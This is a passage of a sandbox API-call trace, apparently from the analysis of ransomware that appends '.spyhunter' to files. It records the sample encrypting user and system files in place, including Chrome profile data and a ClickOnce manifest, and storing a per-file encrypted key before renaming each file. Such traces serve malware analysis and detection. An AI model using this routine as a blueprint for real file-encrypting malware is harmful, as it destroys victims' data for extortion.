lpNewFilePointer=0xffffffff) returned 1 [0131.190] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf59c*=0x2800, lpOverlapped=0x0) returned 1 [0131.191] GetProcessHeap () returned 0x2c0000 [0131.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0131.191] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.191] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5dc*, lpNumberOfBytesWritten=0x25cf59c*=0x4, lpOverlapped=0x0) returned 1 [0131.926] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf59c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf59c*=0x30, lpOverlapped=0x0) returned 1 [0131.926] CloseHandle (hObject=0x158) returned 1 [0131.933] GetProcessHeap () returned 0x2c0000 [0131.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f804d0 [0131.933] wnsprintfW (in: pszDest=0x2f804d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter") returned 134 [0131.933] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.spyhunter" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.spyhunter")) returned 1 [0131.934] GetProcessHeap () returned 0x2c0000 [0131.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f804d0 | out: hHeap=0x2c0000) returned 1 [0131.934] GetProcessHeap () returned 0x2c0000 [0131.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0131.934] GetProcessHeap () returned 0x2c0000 [0131.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06058 | out: hHeap=0x2c0000) returned 1 [0131.934] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5d8 | out: pbBuffer=0x25cf5d8) returned 1 [0131.934] GetProcessHeap () returned 0x2c0000 [0131.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0131.934] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5d0*=0x30) returned 1 [0131.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0131.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0131.934] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".txt") returned 0x0 [0131.935] GetProcessHeap () returned 0x2c0000 [0131.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0131.935] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf594*=0x560, lpOverlapped=0x0) returned 1 [0132.003] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffaa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.003] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x25cf594, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf594*=0x560, lpOverlapped=0x0) returned 1 [0132.003] GetProcessHeap () returned 0x2c0000 [0132.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.003] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.004] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf594, lpOverlapped=0x0 | out: lpBuffer=0x25cf5d4*, lpNumberOfBytesWritten=0x25cf594*=0x4, lpOverlapped=0x0) returned 1 [0132.004] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf594, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf594*=0x30, lpOverlapped=0x0) returned 1 [0132.004] CloseHandle (hObject=0x158) returned 1 [0132.004] GetProcessHeap () returned 0x2c0000 [0132.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.004] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.spyhunter") returned 185 [0132.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.spyhunter")) returned 1 [0132.005] GetProcessHeap () returned 0x2c0000 [0132.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.005] GetProcessHeap () returned 0x2c0000 [0132.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.005] GetProcessHeap () returned 0x2c0000 [0132.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e350 | out: hHeap=0x2c0000) returned 1 [0132.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5d0 | out: pbBuffer=0x25cf5d0) returned 1 [0132.007] GetProcessHeap () returned 0x2c0000 [0132.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5c8*=0x30) returned 1 [0132.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0132.008] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0132.008] GetProcessHeap () returned 0x2c0000 [0132.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.008] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf58c*=0x29, lpOverlapped=0x0) returned 1 [0132.009] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.009] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf58c*=0x29, lpOverlapped=0x0) returned 1 [0132.009] GetProcessHeap () returned 0x2c0000 [0132.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.009] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.009] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5cc*, lpNumberOfBytesWritten=0x25cf58c*=0x4, lpOverlapped=0x0) returned 1 [0132.009] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf58c*=0x30, lpOverlapped=0x0) returned 1 [0132.009] CloseHandle (hObject=0x158) returned 1 [0132.010] GetProcessHeap () returned 0x2c0000 [0132.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.010] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.spyhunter") returned 134 [0132.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.spyhunter")) returned 1 [0132.010] GetProcessHeap () returned 0x2c0000 [0132.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.010] GetProcessHeap () returned 0x2c0000 [0132.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.010] GetProcessHeap () returned 0x2c0000 [0132.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06058 | out: hHeap=0x2c0000) returned 1 [0132.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5d0 | out: pbBuffer=0x25cf5d0) returned 1 [0132.011] GetProcessHeap () returned 0x2c0000 [0132.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.011] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5c8*=0x30) returned 1 [0132.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0132.011] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0132.011] GetProcessHeap () returned 0x2c0000 [0132.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.011] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf58c*=0xa7, lpOverlapped=0x0) returned 1 [0132.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.012] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf58c*=0xa7, lpOverlapped=0x0) returned 1 [0132.014] GetProcessHeap () returned 0x2c0000 [0132.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.014] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.014] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5cc*, lpNumberOfBytesWritten=0x25cf58c*=0x4, lpOverlapped=0x0) returned 1 [0132.014] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf58c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf58c*=0x30, lpOverlapped=0x0) returned 1 [0132.014] CloseHandle (hObject=0x158) returned 1 [0132.014] GetProcessHeap () returned 0x2c0000 [0132.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.014] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.spyhunter") returned 122 [0132.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.spyhunter")) returned 1 [0132.015] GetProcessHeap () returned 0x2c0000 [0132.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.015] GetProcessHeap () returned 0x2c0000 [0132.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.015] GetProcessHeap () returned 0x2c0000 [0132.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47bc8 | out: hHeap=0x2c0000) returned 1 [0132.015] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5c8 | out: pbBuffer=0x25cf5c8) returned 1 [0132.015] GetProcessHeap () returned 0x2c0000 [0132.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5c0*=0x30) returned 1 [0132.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0132.016] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0132.016] GetProcessHeap () returned 0x2c0000 [0132.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.016] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf584*=0x0, lpOverlapped=0x0) returned 1 [0132.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.016] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf584*=0x0, lpOverlapped=0x0) returned 1 [0132.016] GetProcessHeap () returned 0x2c0000 [0132.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.016] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x25cf5c4*, lpNumberOfBytesWritten=0x25cf584*=0x4, lpOverlapped=0x0) returned 1 [0132.017] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf584*=0x30, lpOverlapped=0x0) returned 1 [0132.017] CloseHandle (hObject=0x158) returned 1 [0132.017] GetProcessHeap () returned 0x2c0000 [0132.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.017] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.spyhunter") returned 123 [0132.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock.spyhunter")) returned 1 [0132.018] GetProcessHeap () returned 0x2c0000 [0132.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.018] GetProcessHeap () returned 0x2c0000 [0132.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.018] GetProcessHeap () returned 0x2c0000 [0132.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47a90 | out: hHeap=0x2c0000) returned 1 [0132.018] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5c8 | out: pbBuffer=0x25cf5c8) returned 1 [0132.018] GetProcessHeap () returned 0x2c0000 [0132.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.018] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5c0*=0x30) returned 1 [0132.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.019] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0132.019] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0132.019] GetProcessHeap () returned 0x2c0000 [0132.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.019] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf584*=0x10, lpOverlapped=0x0) returned 1 [0132.019] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.020] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf584*=0x10, lpOverlapped=0x0) returned 1 [0132.020] GetProcessHeap () returned 0x2c0000 [0132.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.020] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.020] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x25cf5c4*, lpNumberOfBytesWritten=0x25cf584*=0x4, lpOverlapped=0x0) returned 1 [0132.020] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf584, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf584*=0x30, lpOverlapped=0x0) returned 1 [0132.020] CloseHandle (hObject=0x158) returned 1 [0132.020] GetProcessHeap () returned 0x2c0000 [0132.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.020] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.spyhunter") returned 126 [0132.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.spyhunter")) returned 1 [0132.021] GetProcessHeap () returned 0x2c0000 [0132.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.021] GetProcessHeap () returned 0x2c0000 [0132.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.021] GetProcessHeap () returned 0x2c0000 [0132.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f476e8 | out: hHeap=0x2c0000) returned 1 [0132.021] CryptGenRandom (in: 